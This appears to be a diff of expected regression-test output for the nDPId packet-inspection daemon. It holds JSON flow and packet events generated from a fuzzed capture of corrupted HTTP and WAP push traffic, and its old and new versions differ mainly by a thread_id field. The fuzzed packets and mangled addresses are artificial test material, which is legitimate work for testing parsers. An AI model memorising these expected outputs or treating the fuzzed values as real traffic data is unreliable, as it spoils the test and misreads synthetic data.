00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488666,"flow_last_seen":1031854488666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854488666,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488666,"flow_last_seen":1031854488666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854488666,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1031854488666,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854488666,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxKdAAEAGF+qsFAMNrBQDBQBQCinJpw1U5EuqimASgyxGZAAAAgQFtA=="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1031854488666,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854488666,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxKdAAEAGF+qsFAMNrBQDBQBQCinJpw1U5EuqimASgyxGZAAAAgQFtA=="}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1031854488666,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854488666,"pkt":"CAAgsl17AFCLk5N8CABFAAAo9UpAAIAGp0qsFAMFrBQDDQopAFDkS6qKyacNVVAQIji\/FQAAAgQFtGDD"} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1031854488666,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854488666,"pkt":"CAAgsl17AFCLk5N8CABFAAAo9UpAAIAGp0qsFAMFrBQDDQopAFDkS6qKyacNVVAQIji\/FQAAAgQFtGDD"}
@@ -17,8 +17,8 @@
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854488668,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxKhAAEAGF+2sFAMNrBQDBQBRCinJpw1V5EuwPlAQgyxYbQAA"} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854488668,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxKhAAEAGF+2sFAMNrBQDBQBRCinJpw1V5EuwPlAQgyxYbQAA"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854488668,"l3_proto":"ip4","src_ip":"0.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854488668,"l3_proto":"ip4","src_ip":"0.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854488668,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxKlAAEAGJXMAFAMNrBQDBQBQCinJpw1V5Eu18lAQgyxSuQAA"} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854488668,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxKlAAEAGJXMAFAMNrBQDBQBQCinJpw1V5Eu18lAQgyxSuQAA"}
00625{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":15,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":243,"pkt_type":21760,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":243,"pkt_l4_len":0,"thread_ts_msec":1031854488771,"pkt":"AFCLk5N8CAAgsl17VQBFAADlxKtAAEAGFy2sFAMNrBQDBQBQCinLpw1V5EvBTVAYgyzwBgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXL+IFJlc2luLzIuMMsxDQpDb2509m50LVR5cGU6IGFwcGxpY2F0aW9uL3ZuZC53YXAubW1zLW1lc3NhZ2UNCkNvbnRlbnQtTGVuZ3RoOiA0NQ0KRGF0ZTogVGh1LCAxMiBTZXAgMjAwMiAxODoxNDo0OCBHTVQNCg0KjIGYMS05YmEwAI2QkoCLMTg5MzAwQGdl\/WTHMi5tb2JpbGl0eWxhYi5uZXQA"} 00611{"packet_event_id":1,"packet_event_name":"packet","packet_id":15,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":243,"pkt_type":21760,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":243,"pkt_l4_len":0,"thread_ts_msec":1031854488771,"pkt":"AFCLk5N8CAAgsl17VQBFAADlxKtAAEAGFy2sFAMNrBQDBQBQCinLpw1V5EvBTVAYgyzwBgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXL+IFJlc2luLzIuMMsxDQpDb2509m50LVR5cGU6IGFwcGxpY2F0aW9uL3ZuZC53YXAubW1zLW1lc3NhZ2UNCkNvbnRlbnQtTGVuZ3RoOiA0NQ0KRGF0ZTogVGh1LCAxMiBTZXAgMjAwMiAxODoxNDo0OCBHTVQNCg0KjIGYMS05YmEwAI2QkoCLMTg5MzAwQGdl\/WTHMi5tb2JpbGl0eWxhYi5uZXQA"}
00213{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":15,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","layer_type":21760,"global_ts_msec":1031854488923} 00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":15,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","layer_type":21760,"global_ts_msec":1031854488923}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489004,"flow_last_seen":1031854489004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854489004,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53132,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489004,"flow_last_seen":1031854489004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854489004,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53132,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1031854489004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1031854489004,"pkt":"AFCLk5N8CAAgsl17CABFAAAwxKxAAEAGF+GsFAMNrBQDBc+MAFDJtOyOAAAAAHACgywbmAAAAQEEiQIEBbQ="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1031854489004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1031854489004,"pkt":"AFCLk5N8CAAgsl17CABFAAAwxKxAAEAGF+GsFAMNrBQDBc+MAFDJtOyOAAAAAHACgywbmAAAAQEEiQIEBbQ="}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1031854489005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854489005,"pkt":"CAAgsl17AFCLk5N8CABFAAAs+0pAAIAGoUasFAMFrBQDDQBQz4zkTZoOyWDsj2ASIjgTJgAAAgQFtG4v"} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1031854489005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854489005,"pkt":"CAAgsl17AFCLk5N8CABFAAAs+0pAAIAGoUasFAMFrBQDDQBQz4zkTZoOyWDsj2ASIjgTJgAAAgQFtG4v"}
@@ -32,10 +32,10 @@
01039{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1031854489131,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":481,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":481,"pkt_l4_len":447,"thread_ts_msec":1031854489131,"pkt":"CAAgsl17AFCLk5N8CABFAAHT\/0pAAIAGm5+sBgMFrBQDDQBQz4zkTZr1ybTxE1AYHbTqTgAAPD94bWwgdmVyc2lvbj0iMS4wIj8+CjwhRE9DVFlQRSBwYXAgUFVCTElDICItLy9XQVBGT1JVTS8vRFREIFBBUCAxLjAvL0VOIgogICAgICAgICAgImh0dHA6Ly93d3cud2FwZm9ydW0ub3JnL0RURC9wYXBfMS4wLmR0ZCI+CjxwYXA+CiAgPHB1c2gtcmVzcG9uc2UgcnVzaC1pZD0iMTg5MzAxXzEwMzE4NTQ0ODg5OTdfMTAzOEBnZWNkczIubW9iaWxpdHlsYWIubmV0IiBzZW5kZXKtYWRkcmVzcz0iaHR0cDovL2xtY21vbGYud2FwbWF0aWMuZGUiIHNlbmRlcuRuYW1lPSJ3Z3A0IiByZXBseS2qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 01039{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1031854489131,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":481,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":481,"pkt_l4_len":447,"thread_ts_msec":1031854489131,"pkt":"CAAgsl17AFCLk5N8CABFAAHT\/0pAAIAGm5+sBgMFrBQDDQBQz4zkTZr1ybTxE1AYHbTqTgAAPD94bWwgdmVyc2lvbj0iMS4wIj8+CjwhRE9DVFlQRSBwYXAgUFVCTElDICItLy9XQVBGT1JVTS8vRFREIFBBUCAxLjAvL0VOIgogICAgICAgICAgImh0dHA6Ly93d3cud2FwZm9ydW0ub3JnL0RURC9wYXBfMS4wLmR0ZCI+CjxwYXA+CiAgPHB1c2gtcmVzcG9uc2UgcnVzaC1pZD0iMTg5MzAxXzEwMzE4NTQ0ODg5OTdfMTAzOEBnZWNkczIubW9iaWxpdHlsYWIubmV0IiBzZW5kZXKtYWRkcmVzcz0iaHR0cDovL2xtY21vbGYud2FwbWF0aWMuZGUiIHNlbmRlcuRuYW1lPSJ3Z3A0IiByZXBseS2qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854495447,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.21.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854495447,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.21.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854495447,"pkt":"CAAgsl17AFCLk5N8CABFAAAsB0tAAIAGlUasFAMFrBUDDQoqAFDkZMdqAADsAGACIABjogAAAgQFtFQI"} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854495447,"pkt":"CAAgsl17AFCLk5N8CABFAAAsB0tAAIAGlUasFAMFrBUDDQoqAFDkZMdqAADsAGACIABjogAAAgQFtFQI"}
00377{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":34,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":58,"pkt_type":2177,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":58,"pkt_l4_len":0,"thread_ts_msec":1031854495447,"pkt":"AFCLk5N8CAAgsl17CIFFAAAsxLVAAEAGF9ysFAMNTBQDBQBQCirJ0lLg5GTHa2ASgywbsgAAAgQFtA=="} 00363{"packet_event_id":1,"packet_event_name":"packet","packet_id":34,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":58,"pkt_type":2177,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":58,"pkt_l4_len":0,"thread_ts_msec":1031854495447,"pkt":"AFCLk5N8CAAgsl17CIFFAAAsxLVAAEAGF9ysFAMNTBQDBQBQCirJ0lLg5GTHa2ASgywbsgAAAgQFtA=="}
00212{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":34,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","layer_type":2177,"global_ts_msec":1031854495447} 00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":34,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","layer_type":2177,"global_ts_msec":1031854495447}
00377{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":35,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1031854495447,"pkt":"CAAgskZ7AFCLk5N8CABFAAAoCKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 00363{"packet_event_id":1,"packet_event_name":"packet","packet_id":35,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1031854495447,"pkt":"CAAgskZ7AFCLk5N8CABFAAAoCKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":35,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","l4_data_len":26,"global_ts_msec":1031854495447} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":35,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","l4_data_len":26,"global_ts_msec":1031854495447}
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"flow_min_l4_payload_len":708,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":708,"midstream":1,"thread_ts_msec":1031854495447,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"flow_min_l4_payload_len":708,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":708,"midstream":1,"thread_ts_msec":1031854495447,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
01411{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":762,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":762,"pkt_l4_len":728,"thread_ts_msec":1031854495447,"pkt":"CAAgsl17AFCLk5N8CABFAALsCUtAAIAGkIasFAMFrBQDDQoqAFDkZMdrbtIa4VAYIjhGCgAAUE9TVCAuc2VydmxldHMvbW1zIEhUVFAvMS4xDQpIb3N0OiAxNzIuMjAuMy4xMw0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94bWwNCkNvbnRlbnQtTGVuZ3RoOiA2MDYNCg0KPD94bWwgdmVyc2lvbj0iMS4wIj8+CjwhRE9DVFlQRSBwYXAgUFVCTElDICItLy9XQb9GT1JVTS8vRFREIFBBUCAxLjAvL0VOIgogICAgICAgICAgImh0dHA6Ly93d3cud2FwZm9ydW0ub3JnL0RURC9yYXBfMS4wLmR0byI+CjxwYXA+CiAgPHJlc3VhdG5vdGlmaWNhdGlvbi1tZXNzYWdlIHB1c2gtaWQ9IjE4OTMwMV8xMDMxODU0NDg4OTk3XzEwMzhAZ2VjZHMyLm1vYmlsaXR5bGFiLm9ldCIgc2VuZGVyLWFkJHJlc3M9Imh0dHA6Ly9sbWNtb2xmLndhcG1hdGljLmRlIiBzZW5kZXItbmFtZT0id2dwNCIgcmVjZWl2ZWQtdGltZT0iMjAwMi0wOS0xMlQxNzo1ODo1NloiIGV2ZW50LXRpbWU9IjIwMDItMDktMTJUMTc6NTk6MDJaIiBtZaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 01411{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":762,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":762,"pkt_l4_len":728,"thread_ts_msec":1031854495447,"pkt":"CAAgsl17AFCLk5N8CABFAALsCUtAAIAGkIasFAMFrBQDDQoqAFDkZMdrbtIa4VAYIjhGCgAAUE9TVCAuc2VydmxldHMvbW1zIEhUVFAvMS4xDQpIb3N0OiAxNzIuMjAuMy4xMw0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94bWwNCkNvbnRlbnQtTGVuZ3RoOiA2MDYNCg0KPD94bWwgdmVyc2lvbj0iMS4wIj8+CjwhRE9DVFlQRSBwYXAgUFVCTElDICItLy9XQb9GT1JVTS8vRFREIFBBUCAxLjAvL0VOIgogICAgICAgICAgImh0dHA6Ly93d3cud2FwZm9ydW0ub3JnL0RURC9yYXBfMS4wLmR0byI+CjxwYXA+CiAgPHJlc3VhdG5vdGlmaWNhdGlvbi1tZXNzYWdlIHB1c2gtaWQ9IjE4OTMwMV8xMDMxODU0NDg4OTk3XzEwMzhAZ2VjZHMyLm1vYmlsaXR5bGFiLm9ldCIgc2VuZGVyLWFkJHJlc3M9Imh0dHA6Ly9sbWNtb2xmLndhcG1hdGljLmRlIiBzZW5kZXItbmFtZT0id2dwNCIgcmVjZWl2ZWQtdGltZT0iMjAwMi0wOS0xMlQxNzo1ODo1NloiIGV2ZW50LXRpbWU9IjIwMDItMDktMTJUMTc6NTk6MDJaIiBtZaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"flow_min_l4_payload_len":708,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":708,"midstream":1,"thread_ts_msec":1031854495447,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13.servlets\/mms","code":0,"content_type":"","user_agent":""}} 